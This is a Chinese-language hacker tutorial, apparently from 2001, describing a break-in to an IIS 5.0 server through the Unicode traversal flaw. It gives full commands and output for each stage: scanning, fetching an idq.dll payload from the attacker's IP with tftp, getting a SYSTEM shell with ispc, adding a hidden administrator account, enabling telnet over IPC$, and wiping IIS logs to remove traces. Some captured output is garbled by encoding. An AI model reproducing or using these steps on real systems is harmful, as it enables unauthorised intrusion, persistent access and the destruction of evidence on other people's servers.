|
UNICODE漏洞入侵并成功夺取ADMIN权限全过程
UNICODE漏洞入侵并成功夺取ADMIN权限全过程
(沙子亡原创,9.18)</P><P> 看了用IDQ提升权限的文章也好多次了,还没时间试试,好!今天有时间就来玩玩(以下文章中提到的软件本站均有下载)。
要用到的软件:
1.流光4.0(扫描)
2.ispc.exe
3.Cleaniislog.exe
4.TFTP32(上载用的软件)
开始行动:
一.启动流光,选择“探测”里面的“扫描POP3/FTP/NT/SQL主机”,填上IP地址范围,扫描主机类型处选“NT/98”,开始扫描吧,泡杯咖啡慢慢等吧,扫完了看看流光中间的地方,有几个黑色的小电脑,(要注意一定要黑色的,其他颜色不是U漏洞哦)后面是IP地址和系统的版本(这里我看到的是WIN2000),类型。。。哈哈!~这就是有U漏洞的机器啦,开工!
要知道,流光的功能是非常强大的哦,我们这次就是用流光自带的IIS远程命令来完成,点击黑色的小电脑,看到有“连接”,在接着看到的小窗口里“允许IIS检测CMD”前打上钩,按“确定”就出现了“IIS远程命令行”的窗口,先输入:
dir回车,看到以下信息:
Directory of c:\inetpub\scripts</P><P>2001/09/02 06:44a <DIR> .
2001/09/02 06:44a <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 11,561,562,112 bytes free
我们这里就知道了服务器的虚拟目录是在c:\inetpub\scripts
好!再运行TFTP32.EXE,在“IIS远程命令行”处打上:
tftp -i 61.140.209.144 GET idq.dll c:\\inetpub\\scripts\\ssinc.dll
(这里要注意把IP换了你自己的IP,idq.dll在ispc的压缩包里有,要把idq.dll放到和TFTP.32的同一个目录下,这句命令是把idq.dll上传到c:\inetpub\scripts下并改名为ssinc.dll,至于ispc的用法也在压缩包里有,自己好好看看),一会就看到:
[tftp -i 61.140.209.144 GET idq.dll c:\\inetpub\\scripts\\ssinc.dll]
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/5.0
Date: Mon, 17 Sep 2001 03:42:49 GMT
Connection: close
Content-Length: 215
Content-Type: text/html
再用dir命令看看上传好没有:dir回车:
Directory of c:\inetpub\scripts</P><P>2001/09/17 11:42a <DIR> .
2001/09/17 11:42a <DIR> ..
2001/09/17 11:42a 32,768 ssinc.dll
2 File(s) 331,536 bytes
2 Dir(s) 11,561,230,336 bytes free
嘿嘿~~`看到了吗?不用我说了吧!~~到这里可以把这个窗口关了!~
再来,在你的命令提示符下打命令了,
D:\hacker>ispc 211.**.50.100/scripts/ssinc.dll
(这里的IP就是刚才你用IIS远程命令连接的IP,这个ISPC每次执行一个命令要打3次回车,要记住哦)如果该目录是可执行的,看下面:
出来啦~~~~~~~~~~
Start to connect to the server...
We Got It!
Please Press Some <Return> to Enter Shell</P><P>Microsoft Windows 2000 [セ
5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.</P><P>C:\WINNT\system32>
现在你是SYSTEM权限咯,可以加个管理员帐户上去啦
C:\WINNT\system32>net user liao 1314 /add
磅︽Θ
C:\WINNT\system32>net localgroup administrators liao /add
磅︽Θ
C:\WINNT\system32>
成功啦!你已有了一个ADMIN帐户了,名称:liao,密码:1314
二.先不要关这个窗口,2000的机器有好多用处哦。再打开另一个命令提示符的窗口:</P><P>D:\hacker>telnet 211.**.50.100
正在连接到211.**.50.100...无法打开到主机的连接: 连接失败
对方没开TELNET服务,那我们就来帮它打开,以下是用过IPC管道来拷文件过去:
D:\hacker>net use \\211.**.50.100\ipc$ "1314" /user:"liao"
命令成功完成。
D:\hacker>copy ntlm.exe \\211.**.50.100\c$\winnt
已复制 1 个文件。
D:\hacker>copy cleaniislog.exe \\211.**.50.100\c$\winnt
已复制 1 个文件。
D:\hacker>net use \\211.**.50.100\ipc$ /delete
\\211.**.50.100\ipc$ 已经删除。</P><P>回到刚才ISPC连接的窗口:
C:\WINNT>ntlm
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.</P><P>Done!
8.C:\WINNT>net stop telnet
C:\WINNT>net stop telnet
﹟ゼ币笆 Telnet 狝叭</P><P>冈灿戈叫块 NET HELPMSG 3521(TELNET服务本来就没开,不管它了)
再来:
C:\WINNT>net start telnet
Telnet 狝叭タ币笆 .
Telnet 狝叭竒币笆Θ</P><P>嘿嘿~!TELNET服务成功启动。。。。
退出这个窗口:
C:\WINNT>exit
the server close connect.</P><P>你现在可以直接TELNET进去啦!
D:\>telnet 211.**.50.100
NTLM Authentication failed due to insufficient credentials. Please login with
clear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:</P><P>在这里打上你刚才加上去的用户名和密码,嘿嘿~`
我进去后第一时间是擦PP~~~~~~咯,刚才不是上传了cleaniislog.exe了吗?就是这个啦
.C:\WINNT>cleaniislog c:\winnt\system32\logfiles\w3svc1\ex010917.log
61.140.209.144</P><P>CleanIISLog Ver 0.1, by Assassin 2001. All Rights
Reserved.</P><P>========Step 1==========
Stopping Service w3svc......
Service w3svc Stopped.
Stopping Service msftpsvc.
Open Service Failed - 1060
========Step 2==========
Process Log File EX010917.LOG...Done (0021) Records Removed
========Step 3==========
Starting up w3svc...
Service w3svc Started.
Restore Service
=========Done==========
注意啦,这里的c:\winnt\system32\logfiles\w3svc1\ex010917.log就是你指定要擦的文件,如果用一个点来代替就是擦所有的文件,不过要很长时间哦,我就有一次等了一个多小时啦,真的惨,你可以一个一个文件看,哪个有你的IP记录的就擦哪个!</P><P>接着你要做什么可不要问我啦!自己想!嘿嘿~~~~~~~
(警告:不要用以上方法搞任何破坏,这只是提供一个思路给你) |